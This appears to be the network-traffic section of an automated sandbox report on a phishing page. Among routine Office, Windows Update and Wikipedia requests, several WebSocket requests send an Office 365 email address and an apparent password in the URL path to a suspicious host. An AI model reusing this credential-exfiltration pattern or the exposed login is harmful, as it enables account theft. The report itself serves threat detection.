Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: http://nova-drive.xkndniwljldraoauu.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: QH8dhGI7SeR4WBOG85fjDA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: http://nova-drive.xkndniwljldraoauu.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: TINilGYeWC3Xo+UmIqn+Qw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3dlPWuYzpmE9uAb&MD=Snkb7rNX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: http://nova-drive.xkndniwljldraoauu.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 8DpvXvEqlmvCrZ6mF+7E2A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: http://nova-drive.xkndniwljldraoauu.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: apinp6EeVnRODBeoy0GXBg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: http://nova-drive.xkndniwljldraoauu.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: D4D3VZCriZey2/qjQYxAyA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /n7brnx1iy HTTP/1.1Host: hmf1bnz.slfpgqqwzuxppnscs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206 HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nova-drive.xkndniwljldraoauu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.co.kr
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: hmf1bnz.slfpgqqwzuxppnscs.com
Source: global trafficDNS traffic detected: DNS query: fdfxhdq0by6.xkndniwljldraoauu.com
Source: global trafficDNS traffic detected: DNS query: nova-drive.xkndniwljldraoauu.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: wikipedia.com
Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
Source: chromecache_55.2.dr, chromecache_66.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13393
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.jquery.com/ticket/4833
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_64.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: chromecache_64.2.drString found in binary or memory: https://code.jquery.com/jquery-3.4.1.js
Source: chromecache_58.2.drString found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_58.2.drString found in binary or memory: https://donate.wikimedia.org/?wmf_medium=portal&wmf_campaign=portalFooter&wmf_source=portalFooter
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_64.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4gaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4iaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4jaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4vaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5OaVI
Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5caVI
Source: chromecache_58.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy
Source: chromecache_58.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use
Source: chromecache_69.2.dr, chromecache_70.2.dr, chromecache_63.2.drString found in binary or memory: https://getbootstrap.com)
Source: chromecache_60.2.dr, chromecache_57.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_69.2.dr, chromecache_70.2.dr, chromecache_60.2.dr, chromecache_63.2.dr, chromecache_57.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_69.2.dr, chromecache_70.2.dr, chromecache_60.2.dr, chromecache_57.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://github.com/whatwg/html/issues/2369
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/#nonce-attributes
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_58.2.drString found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_64.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: chromecache_64.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: chromecache_58.2.drString found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
Source: chromecache_58.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_65.2.dr, chromecache_62.2.drString found in binary or memory: https://sizzlejs.com/
